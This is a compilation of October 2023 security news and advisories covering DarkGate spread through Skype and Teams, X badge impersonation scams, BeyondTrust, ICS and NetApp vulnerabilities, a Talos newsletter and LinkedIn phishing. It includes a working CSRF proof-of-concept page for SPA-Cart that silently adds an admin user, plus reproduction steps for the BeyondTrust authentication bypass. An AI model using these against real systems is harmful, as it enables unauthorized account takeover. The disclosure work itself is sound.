A plurality of the targets in the ongoing campaign have been based in the Americas.

A threat actor is using compromised Skype and Microsoft Teams accounts to distribute DarkGate, a troublesome loader associated with multiple malicious activities, including information theft, keylogging, cryptocurrency miners, and ransomware such as Black Basta.

Forty-one percent of the targets of the campaign — which appears to have begun in August — are organizations in the Americas, according to researchers at Trend Micro who are tracking the activity.

In a report this week, Trend Micro also said its researchers had observed the developer of DarkGate begin to advertise the malware on underground forums and renting it out on a malware-as-a-service basis to affiliate threat actors. The pivot, after years of going it alone, has resulted in a recent surge in DarkGate activity after a relative lull.

**Microsoft Phishing Via Skype and Teams**

The operator of the DarkGate campaign that Trend Micro is currently tracking is using both Skype and Teams to distribute the malware. In one of the attacks, the threat actor took control of a Skype account belonging to an individual at an organization with whom the target recipient's organization had a trusted relationship. The adversary basically used the compromised Skype account to hijack an existing message thread and send a message that appeared to contain a PDF file but was actually a malicious VBS script. When the recipient executed the file, it initiated a sequence of steps to download and install DarkGate on the target computer.

In another attack that Trend Micro analyzed, the threat actor attempted to achieve the same outcome using a Teams account to send a message with a malicious .LNK file, to a target recipient. Unlike the Skype caper, where the threat actor purported to be someone belonging to a trusted third party, in the Teams variation, the recipient received the malicious message from an unknown, external entity. 

"In this case, the organization’s system allowed the victim to receive messages from external users, which resulted in them becoming a potential target of spam," Trend Micro said.

"We also observed a tertiary delivery method of using a VBA script wherein a .LNK file arrives in a compressed file from the originators' SharePoint site," the security vendor said. In this attack variation, the threat actor attempts to lure the victim to a specific SharePoint site, to download a file named "Significant company changes September.zip."

**DarkGate: A Potent Threat**

DarkGate is malware that has targeted users in various regions around the world since at least 2017. It integrates multiple relatively potent functions; for instance, the malware can execute commands for gathering system information, mapping networks, and doing directory traversal. It also implements remote desktop protocol (RDP), hidden virtual network computing, AnyDesk, and other remote access software. Other "features" include ones related to cryptocurrency mining, keylogging, privilege escalation, and stealing information from browsers.

For payload delivery and execution, DarkGate uses AutoIT, a legitimate Windows automation and scripting tool that authors of other malware families have used for obfuscation and defense evasion.

**DarkGate Offers Multiple Potential Payloads**

Trend Micro's analysis showed that once DarkGate is installed on a system, it drops additional payloads. Sometimes those are variants of DarkGate itself or of Remcos, a remote access Trojan (RAT) that attackers previously haveused for cyber-espionage surveillance and for stealing tax-related information.

Trend Micro said it was able to contain the DarkGate attacks it observed before any actual harm came to pass. But given the developer's apparent pivot to a new malware leasing model, enterprise security teams can expect more attacks from varied threat actors. The objectives of these adversaries could vary, meaning organizations need to keep an eye out for threat actors using DarkGate to infect systems with different kinds of malware.

While the attacks that Trend Micro observed targeted individual Skype and Teams recipients, the attacker's goal clearly was to use their systems as an initial foothold on the target organization's networks. "The goal is still to penetrate the whole environment, and depending on the threat group that bought or leased the DarkGate variant used, the threats can vary from ransomware to cryptomining," according to Trend Micro.

The security firm recommends that organizations enforce rules around the use of instant messaging applications such as Skype and Teams. These rules should include blocking external domains, controlling the use of attachments and implementing scanning measures if possible. Multifactor authentication is also crucial to prevent threat actors from misusing illegally obtained credentials to hijack IM accounts, Trend Micro said.

DarkGate Operator Uses Skype, Teams Messages to Distribute Malware

Scammers have targeted the vaunted blue check marks on the platform formerly known as Twitter, smearing individuals and brands alike.

Fraudsters are taking advantage of the new verification system implemented by X, formerly known as Twitter, in order to impersonate brands and steal personal information.

The infamous blue checkmark used to be reserved for verified companies and influencers. But after purchasing the microblogging giant, and following a period of rapidly declining users and revenue, Elon Musk changed the rules, enabling anybody to obtain one simply by paying a monthly fee.

The site's new, liberal approach to authentication has opened the door for scammers, while the introduction of other tiers of "authentication" — gold and gray badges, for instance — has created confusion for brands and users alike.

Dark Reading was unable to reach X for comment on this story.

**How Blue Check Scams Work**

In July, the budget British airline easyJet canceled over 1,700 summer flights from Gatwick Airport in London.

Anticipating a wave of angry customers, scammers filled in the void.

According to the UK nonprofit Which?, a bevy of copycat easyJet accounts were created in the hours thereafter, with at least five surviving an initial sweep of account shutdowns. Their usernames mimicked the company's legitimate username, and in their bios they linked to "Online Help Hubs," which were actually just phishing pages designed to harvest personal information. The scammers also engaged angry customers over direct messages, and occasionally intervened in conversations they were having with the actual company.

_Source: Which?_

Not all of the blame lies with X, though. Companies that shirk on customer service often direct angry customers to social media instead, since it's allegedly faster (read: more cost-effective).

One UK resident told The Guardian in August how, after months of fruitlessly attempting to get a refund on a canceled holiday flight, he finally conceded to engage with Booking.com over X.

Booking.com asked him to send them his phone number via DM. After a call over WhatsApp, they agreed to refund his payment, but he would first need to download an app.

Only then, with his suspicion aroused, did the man realize the company's account handle had an unexpected hyphen in it, and their WhatsApp caller ID traced to Kenya.

"I've since come across other fake Booking.com Twitter accounts which are following customers who are at their wits' end trying to get a refund and have resorted to X to air their grievance with the company,” he recalled to reporters.

**Reckoning With the New Check Mark System**

Rather than just the blue check mark, X currently offers four tiers for accounts:

*   The blue check now only reflects that a user pays for an "X Premium" monthly subscription.
*   Gray check marks are reserved for government bodies and officials.
*   Gold check marks replace the blue, to authenticate official corporate accounts.
*   Individuals associated with organizations may also have a logo next to their names.

A gold badge costs $1,000 per month (plus $50 for additional affiliates), meaning that small businesses may not be able to afford authentication, and larger ones may not want to pay. And it's even led to inconsistencies within organizations. In a blog published Thursday, Kaspersky highlighted how Microsoft's presence on X is a mess of accounts with and without gold check marks, some affiliated with the organization and some not.

**What Companies Can Do About X Brand Impersonation**

Companies unable (or unwilling) to shell out the cash and organize around X's new rules — and companies like easyJet, for whom even doing everything right isn't enough to fend off copycats — will need other means of protecting their customers and their brand names. Because like any typosquatting endeavor, a diligent phishing campaign can erode consumer trust.

"For sensitive communication or support," says Callie Guenther, senior manager of threat research at Critical Start, "directing customers back to the official website or a recognized customer service number can be effective. And a consistent online presence, characterized by regular updates and engagement, can deter impersonators and give customers confidence in the brand's authenticity."

However, she cautions, "any system that implies trust through verification can be exploited, so users should always be cautious. LinkedIn, for example, doesn't have a checkmark system similar to Twitter, but fake profiles or impersonators can still exist."

Brands Beware: X's New Badge System Is a Ripe Cyber-Target

BeyondTrust Privileged Remote Access (PRA) versions 22.2.x to 22.4.x are vulnerable to a local authentication bypass. Attackers can exploit a flawed secret verification process in the BYOT shell jump sessions, allowing unauthorized access to jump items by guessing only the first character of the secret.

############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Privileged Remote Access (PRA) # Vendor: BeyondTrust # CSNC ID: CSNC-2022-018 # CVE ID: CVE-2023-23632 # Subject: Session take over / Privilege Escalation # Severity: High # Effect: Locally exploitable # Author: Christian Feuchter # Date: 02.10.2023 # ############################################################# Introduction ------------ BeyondTrust Privileged Remote Access controls, manages, and audits privileged accounts and credentials. This enables just-in-time, zero trust access to on-premises and cloud resources by internal, external, and third-party users \[1\]. Compass Security identified an incorrect verification of a secret, allowing a low privileged malicious process or another user on the same host to connect to a jump item's (network device, server, etc.) shell without any further authentication. Affected -------- Vulnerable: \* BeyondTrust Privileged Remote Access (PRA) 22.2.x / 22.3.x / 22.4.x Technical Description --------------------- When the usage of external tools for shell jump sessions is allowed, users can enable the feature in their local BeyondTrust Access Console Client. If the connection to a jump item is established, a local (127.0.0.1) SSH listener is started, and the connection string is displayed in the Access Console Client. The connection string contains a randomly generated secret as username parameter. This string is supposed to mitigate the risk of unauthorized access to the local SSH listener by other users on the same host or low-privileged malicious processes. However, the identified weakness lies in the product's flawed validation of this secret. Instead of properly verifying the whole secret, the system accepts it if the provided characters are in the correct position but does not check the number of characters provided. In other words, only the first correct character is required to establish a connection to the jump item without the need for any further authentication. Since no bruteforce protection is implemented, the first character can be guessed quickly. This allows a reliable bypass of the authentication mechanism and gain unauthorized access to the jump item. Steps to reproduce: 1. Enable the "Open Shell Jump Sessions with an External Tool" setting in the BeyondTrust Access Console client \[2\]. 2. Connect to a jump item and copy the SSH connection string including the secret in in the username (-l parameter). 3. Delete all but the first character of the secret (-l parameter). Use the modified SSH connection string with the truncated secret (-l parameter) to connect to the jump item. Vulnerability Classification ---------------------------- CVSS v3.1 Metrics: - CVSS Base Score: 8.6 (High) - CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H Workaround / Fix ---------------- Workaround: Disallow the usage of external tools for Shell Jump sessions. Fix: Privileged Remote Access should be updated to version 22.3.3 / 23.1.1 or newer \[3\]. Timeline -------- 2022-12-02: Discovery by Christian Feuchter 2022-12-22: Initial vendor notification 2023-01-03: Initial vendor response 2023-01-16: Assigned CVE-2023-23632 2023-05-09: Release of fixed Version / Patch 2023-06-09: Coordinated public disclosure 2023-08-24: Coordinated public disclosure 2023-10-02: Disclosure of advisory References ---------- \[1\] https://www.beyondtrust.com/products/privileged-remote-access \[2\] https://www.beyondtrust.com/docs/privileged-remote-access/getting-started/access-console/settings.htm \[3\] https://beyondtrustcorp.service-now.com/csm?id=kb\_article\_view&sysparm\_article=KB0019434

CVE-2023-23632

By Waqas
New CISA Advisories Highlight Vulnerabilities in Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric ICS Products.
This is a post from HackRead.com Read the original post: New CISA Advisories Highlight Vulnerabilities in Top ICS Products

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories.

The Cybersecurity and Infrastructure Security Agency (CISA) released nineteen Industrial Control Systems (ICS) advisories on October 12, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

The advisories cover a wide range of ICS products and vendors, including Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric. The vulnerabilities identified in the advisories range in severity from low to critical. Some of the vulnerabilities could allow attackers to gain unauthorized access to ICS systems, disrupt operations, or even cause physical issues.

CISA encourages users and administrators of ICS systems to review the newly released advisories for technical details and mitigations. Here are some of the key vulnerabilities identified in the CISA advisories:

*   **Siemens SIMATIC CP products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a remote code execution attack.
*   **Siemens SCALANCE W1750D:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Siemens SICAM A8000 Devices:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.
*   **Mitsubishi Electric MELSEC-F Series:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a cross-site scripting (XSS) attack.
*   **Hikvision Access Control and Intercom Products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Schneider Electric IGSS:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.

ICSA-23-285-08 Siemens SINEC NMS
ICSA-23-285-15 Advantech WebAccess
ICSA-23-285-06 Siemens SICAM PAS/PQS
ICSA-23-285-16 Schneider Electric IGSS
ICSA-23-285-02 Siemens SCALANCE W1750D
ICSA-23-285-07 Siemens RUGGEDCOM APE180
ICSA-23-285-05 Siemens Simcenter Amesim
ICSA-23-285-12 Weintek cMT3000 HMI Web CGI
ICSA-23-285-03 Siemens SICAM A8000 Devices
ICSA-23-285-01 Siemens SIMATIC CP products
ICSMA-23-285-02 Santesoft Sante FFT Imaging
ICSA-23-285-04 Siemens Xpedition Layout Browser
ICSMA-23-285-01 Santesoft Sante DICOM Viewer Pro
ICSA-23-243-03 PTC Kepware KepServerEX (Update A)
ICSA-23-285-10 Siemens Tecnomatix Plant Simulation 
ICSA-23-285-13 Mitsubishi Electric MELSEC-F Series
ICSA-23-285-11 Siemens Mendix Forgot Password Module
ICSA-23-285-14 Hikvision Access Control and Intercom Products
ICSA-23-285-09 Siemens CPCI85 Firmware of SICAM A8000 Devices

CISA recommends that users and administrators of ICS systems take the following steps to mitigate these vulnerabilities:

*   Monitor ICS systems for suspicious activity.
*   Develop and implement an incident response plan.
*   Apply security patches from vendors as soon as they are available.
*   Implement a layered security approach that includes network segmentation, firewalls, and intrusion detection systems.

ICS systems are used to control critical infrastructure, such as power grids, water treatment systems, and transportation networks. A successful cyber attack on an ICS system could have devastating consequences.

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories. In addition to the steps recommended by CISA, organizations that operate ICS systems should also consider the following:

*   Conduct regular security assessments of ICS systems to identify and address vulnerabilities.
*   Develop and implement a security awareness training program for employees who use ICS systems.
*   Keep ICS systems isolated from the internet and other untrusted networks.
*   Use strong passwords and enable multi-factor authentication for all ICS systems.

By taking these steps, organizations can protect their ICS systems from cyberattacks, especially the increasingly prevalent cybersecurity threat of ransomware attacks, and minimize the risk of disruption to their operations.

****_RELATED ARTICLES_****

1.  CISA Publishes List of Free Cybersecurity Tools and Services
2.  Major ransomware attack cripples largest gas pipeline in the US
3.  GreyEnergy: New malware targeting energy sector with espionage
4.  Siemens ALM 0-Day Vulnerabilities Posed Full Remote Takeover Risk
5.  Crit.IX: Flaws in Honeywell Experion DCS, Posing Risk to Critical Industries

New CISA Advisories Highlight Vulnerabilities in Top ICS Products

ONTAP 9 versions prior to 9.8P19, 9.9.1P16, 9.10.1P12, 9.11.1P8, 
9.12.1P2 and 9.13.1 are susceptible to a vulnerability which could allow
 a remote unauthenticated attacker to cause a crash of the HTTP service.

*   Home
*   Advisory
*   CVE-2023-27314 Denial of Service Vulnerability in ONTAP 9

circle-check-alt This advisory should be considered the single source of current, up-to-date, authorized and accurate information from NetApp regarding Full Support products and versions.

**Subscribe to NTAP-20231009-0001 updates**

**Unsubscribe from NTAP-20231009-0001 advisory updates**

**Advisory ID:** NTAP-20231009-0001 **Version:** 1.0 **Last updated:** 10/09/2023 **Status:** Final. **CVEs:** CVE-2023-27314

This document is provided solely for informational purposes. All information is based upon NetApp’s current knowledge and understanding of the hardware and software products tested by NetApp, and the methodology and assumptions used by NetApp. NetApp is not responsible for any errors or omissions that may be contained herein, and no warranty, representation, or other legal commitment or obligation is being provided by NetApp. © 2022 NetApp, Inc. All rights reserved. No portions of this document may be reproduced without prior written consent of NetApp, Inc.

CVE-2023-27314: CVE-2023-27314 Denial of Service Vulnerability in ONTAP 9

SnapCenter versions 3.x and 4.x prior to 4.9 are susceptible to a 
vulnerability which may allow an authenticated unprivileged user to gain
 access as an admin user.



*   Home
*   Advisory
*   CVE-2023-27313 Privilege Escalation Vulnerability in SnapCenter

circle-check-alt This advisory should be considered the single source of current, up-to-date, authorized and accurate information from NetApp regarding Full Support products and versions.

**Subscribe to NTAP-20230713-0002 updates**

**Unsubscribe from NTAP-20230713-0002 advisory updates**

**Advisory ID:** NTAP-20230713-0002 **Version:** 1.0 **Last updated:** 07/13/2023 **Status:** Final. **CVEs:** CVE-2023-27313

This document is provided solely for informational purposes. All information is based upon NetApp’s current knowledge and understanding of the hardware and software products tested by NetApp, and the methodology and assumptions used by NetApp. NetApp is not responsible for any errors or omissions that may be contained herein, and no warranty, representation, or other legal commitment or obligation is being provided by NetApp. © 2022 NetApp, Inc. All rights reserved. No portions of this document may be reproduced without prior written consent of NetApp, Inc.

CVE-2023-27313: CVE-2023-27313 Privilege Escalation Vulnerability in SnapCenter

SnapCenter Plugin for VMware vSphere versions 4.6 prior to 4.9 are 
susceptible to a vulnerability which may allow authenticated 
unprivileged users to modify email and snapshot name settings within the
 VMware vSphere user interface.




*   Home
*   Advisory
*   CVE-2023-27312 Privilege Escalation Vulnerability in SnapCenter Plugin for VMware vSphere

circle-check-alt This advisory should be considered the single source of current, up-to-date, authorized and accurate information from NetApp regarding Full Support products and versions.

**Subscribe to NTAP-20230713-0001 updates**

**Unsubscribe from NTAP-20230713-0001 advisory updates**

**Advisory ID:** NTAP-20230713-0001 **Version:** 1.0 **Last updated:** 07/13/2023 **Status:** Final. **CVEs:** CVE-2023-27312

This document is provided solely for informational purposes. All information is based upon NetApp’s current knowledge and understanding of the hardware and software products tested by NetApp, and the methodology and assumptions used by NetApp. NetApp is not responsible for any errors or omissions that may be contained herein, and no warranty, representation, or other legal commitment or obligation is being provided by NetApp. © 2022 NetApp, Inc. All rights reserved. No portions of this document may be reproduced without prior written consent of NetApp, Inc.

CVE-2023-27312: CVE-2023-27312 Privilege Escalation Vulnerability in SnapCenter Plugin for VMware vSphere

SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-43149
#Author : Aitor Herrero Fuentes

# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/admin
# Version: 1.9.0.3
# Tested on: Windows 10 Pro

CSRF ADD ROOT ACCOUNT

Cross Site Request Forgery vulnerability in application demo.spa-cart.com allows a remote attacker to execute arbitrary code , add an malicius  user with "role status" with one click  
A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code.
This code could then be used to delete all accounts.


POC

 1 - Make an file with with this CODE and SAVE in HTML 
 Attack Delete  All Account

<html>
    <body>
    <form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="posted&#95;data&#91;firstname&#93;" value="mal1" />
      <input type="hidden" name="posted&#95;data&#91;lastname&#93;" value="mal2" />
      <input type="hidden" name="posted&#95;data&#91;phone&#93;" value="156415641561" />
      <input type="hidden" name="posted&#95;data&#91;email&#93;" value="mal1&#64;test&#46;com" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="posted&#95;data&#91;usertype&#93;" value="C" />
      <input type="hidden" name="posted&#95;data&#91;roleid&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;status&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;address&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;city&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;state&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;country&#93;" value="AG" />
      <input type="hidden" name="posted&#95;data&#91;zipcode&#93;" value="05584" />
      <input type="hidden" name="posted&#95;data&#91;pending&#95;membershipid&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;membershipid&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>


2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button
the code will changes in his actually session.

CVE-2023-43149: GitHub - MinoTauro2020/CVE-2023-43149: CVE-2023-43149

Plus, many of the world’s largest cloud providers are warning of a vulnerability that attackers exploited in August to launch the largest distributed denial-of-service attack on record.

Thursday, October 12, 2023 14:10

Welcome to this week’s edition of the Threat Source newsletter. 

I didn’t feel like I wanted to write anything special or witty this week given the current events in Israel and the Gaza Strip, but I will certainly advocate for any assistance readers would like to provide to the various organizations and helpers who are trying to do some good for Israeli and Palestinian civilians right now.  

And since it’s still Cybersecurity Awareness Month, I also wanted to provide some links to various resources, blog posts and podcasts that I’ve found particularly helpful this month and I think you will, too. 

*   Countering the Rise of Ransomware (Cisco YouTube) 
*   Talos APJC Threat Update: How attackers are using AI 
*   The New Normal: How XDR is Tackling Social Engineering in Today’s World (Cisco Secure blog) 
*   CISA’s Secure Our World initiative 
*   Allied Against Hate: CISA resources for faith and community leaders 
*   Fact sheet: Improving Security of Open Source Software in Operational Technology and Industrial Control Systems 

**The one big thing **

Many of the world’s largest cloud providers are warning of a vulnerability that attackers exploited in August to launch the largest distributed denial-of-service attack on record. CVE-2023-44487, a vulnerability in the HTTP/2 protocol, was recently used to launch intensive DDoS attacks against several targets. The problem lies in the way that HTTP/2 protocol handles request cancellations or resets. When a client issues a reset for an HTTP/2 request, this consumes resources on the server as it cancels the corresponding stream. However, after issuing a reset, the client can instantly open a new stream. 

**Why do I care? **

Google said the attack in August was the heaviest DDoS assault it ever recorded at over 398 million requests per second, which the company said is more than seven times larger than any other its ever recorded. So, the sheer scale is certainly notable. If this type of attack was launched with a much larger botnet, the traffic volume could be orders of magnitude greater and have a much larger potential impact. As such, organizations are urged to patch or mitigate as quickly as possible. 

**So now what? **

Users of any products using the vulnerable protocol — individual companies like F5 and Microsoft have released individual advisories about anything that was affected — should make sure patches are implemented immediately. However, this issue is largely about appropriate DDoS mitigation techniques on your environment. A newly released Snort rule, SID 62519, can detect activity associated with this vulnerability.  

**Top security headlines of the week **

**Attackers have published the personal information of almost one million people who have Ashkenazi Jew heritage** after the adversaries breached genetic testing service 23AndMe. The list allegedly includes full names, sex and 23AndMe’s data on where their ancestry stems from. As of Wednesday morning, the company was still investigating the attackers’ claims but assumed it was authentic. Customers can learn more about their family’s heritage by providing identification data, health information, phenotype, photos and more to 23AndMe. A security researcher said the information looked authentic, and that it’s a sign that a data breach can be dangerous, even if attackers don’t end up manually breaking into a deeper layer of the network. (The Record by Recorded Future 23andMe scraping incident leaked data on 1.3 million users of Ashkenazi and Chinese descent)  

**Microsoft patched more than 100 vulnerabilities in its range of products as part of its monthly security update.** This batch included two zero-day vulnerabilities that had already been exploited in the wild and nine critical issues in the Layer 2 tunneling protocol. Meanwhile, Apple also released a security update Tuesday to fix two critical vulnerabilities in its iOS mobile operating system that were also being exploited in the wild. CVE-2023-42724 in iOS and iPadOS, has been exploited by attackers to elevate their access on a local device. Back on the Microsoft side, the company also used Patch Tuesday as an opportunity to fix security holes in their products related to the high-profile HTTP/2 protocol used to launch massive, distributed denial-of-service (DDoS) attacks earlier this year. (Talos, Krebs on Security) 

The International Committee of the Red Cross published new guidelines this week, **hoping hacktivist groups will follow during wartime to avoid affecting critical infrastructure and everyday civilians.** An increasing number of civilian hackers have become involved in international conflicts hoping to make a difference, especially in the Russia-Ukraine war and now again in Israel. The Red Cross’ new guidelines urge these groups and individuals to obey national laws, if appropriate, and follow the same set of rules for kinetic warfare that international humanitarian law (IHL) provides, and which are aimed at safeguarding “civilians, and soldiers who are no longer able to fight, from some of the horrors of war.” Some of the objectives put forth include not targeting civilian objectives, deploying any malware that may target military and civilian targets indiscriminately and adhering to these rules even if the enemy does not. (Washington Post, SecurityWeek). 

**Can’t get enough Talos? **

*   Talos Takes Ep. #157: Cybersecurity Awareness Month: The best practices for implementing multi-factor authentication 
*   Qakbot hackers now pushing Cyclops/Ransom Knight ransomware, Cisco says 
*   Qakbot hackers are still spamming victims despite FBI takedown 
*   Qakbot Attackers Remain Alive and Quacking, Researchers Find 
*   Researcher Spotlight: How looking at decades of spam led Jaeson Schultz from Y2K to the metaverse and cryptocurrency 
*   Vulnerability Roundup: 10 zero-day vulnerabilities in industrial cell router could lead to code execution, buffer overflow 

**Upcoming events where you can find Talos **

**ATT&CKcon 4.0** **(Oct. 24 - 25)** 

_McLean, Virginia_ 

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking. 

**misecCON** **(Nov. 17)** 

_Lansing, Michigan_ 

> Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines. 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827**  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa**   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa   
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27   
**Typical Filename:** профиль 10 класс.exe   
**Claimed Product:** N/A   
**Detection Name:** Application\_Blocker

Top resources for Cybersecurity Awareness Month

By Deeba Ahmed
LinkedIn and Microsoft users, watch out for this phishing scam!
This is a post from HackRead.com Read the original post: LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts

Cofense cybersecurity researchers have noticed a sudden uptick in phishing messages sent via LinkedIn, as they observed around 800 emails sent between July and August 2023.

****_KEY FINDINGS_****

*   **A new LinkedIn phishing scam targets users to steal their Microsoft account login credentials.**

*   **Phishing actors are exploiting LinkedIn’s Smart Link feature to evade email security mechanisms and redirect users to phishing pages designed to steal financial data.**

*   **The Smart Links feature is part of LinkedIn Sales Navigator and Enterprise and allows users to send up to 15 documents with a single trackable link.**

*   **Phishing actors are interested in exploiting Smart Links to make their phishing emails seem legitimate and appear to be sent by a trusted source apart from bypassing email protections.**

*   **This campaign targets diverse industries, but the most prominent targets are the finance and manufacturing sectors.**

If you use **LinkedIn** to connect with your colleagues or industry experts, then you should feel alert because, in the newly discovered phishing campaign, threat actors are abusing a legitimate feature of LinkedIn to send authentic-looking phishing emails.

According to a report from email security firm Cofense, the feature exploited in this campaign is **Smart Links**, part of the LinkedIn Sales Navigator and Enterprise service. Phishers are abusing it to steal payment data. They exploit Smart Links to bypass email protection mechanisms and deliver malicious lures into the email inboxes of Microsoft users. Cofense

Cofense cybersecurity researchers have noticed a sudden uptick in phishing messages sent via LinkedIn, as they observed around 800 emails sent between July and August 2023. These emails were sent through 80 unique Smart Links and mostly lured users with payments, essential documents, security notifications, or recruitment-related messages.

According to Cofense’s blog post, all the messages contained an embedded link/button to redirect the victim to a malicious website where the attackers compel them to give away personal/financial data or login credentials. 

The report’s author, Cofense cyber threat intelligence analyst Nathaniel Raymond, noted that this campaign most probably exploits newly created or compromised business accounts on LinkedIn to deliver malicious lures and forces users to provide their Microsoft account details.

Clicking on viewing document opens a fake Microsoft login page that steals credentials (Image credit: Cofense)

For your information, this feature allows businesses to promote ads or websites and redirect users to their desired domains. This tool lets business account holders contact LinkedIn users via trackable ‘smart’ links. The sender can track who interacted with their messages and in what manner. Therefore, this tool is ideal for pitch testing and enhancing the process.

The smart link includes the LinkedIn domain with a parameter and an eight-alphanumeric character ID. However, adversaries have added new information, such as the recipient’s email ID, to autofill the phishing page the victim gets redirected to.

Employees at a wide range of organizations are targeted in this campaign, including manufacturing, financial, energy, construction, insurance, health, mining, consumer goods, and technology. But manufacturing and financial organizations were the top targets.

> _“Despite finance and manufacturing having higher volumes, it can be concluded that this campaign was not a direct attack on any one business or sector but a blanket attack to collect as many credentials as possible using LinkedIn business accounts and smart links to carry out the attack.”_
> 
> Nathaniel Raymond – Cofense

To protect yourself against malicious phishing links, you must be wary of emails from unknown users, even if the email came from an authentic source or domain. Only click on links embedded in the email if you believe the email is legit, and if you are unsure, a good idea is to contact the sender directly to verify it. Use a reliable password manager to create unique passwords for online accounts and **enable 2FA** on all of them.

1.  New LinkedIn phishing campaign found using Google Forms
2.  Fake LinkedIn job offers scam spreading More\_eggs backdoor
3.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
4.  Ducktail Malware Exploits LinkedIn to Hack Facebook Business Accounts
5.  Hackers Used Fake LinkedIn Job Offer to Hack Off $625M from Axie Infinity

Tag

#auth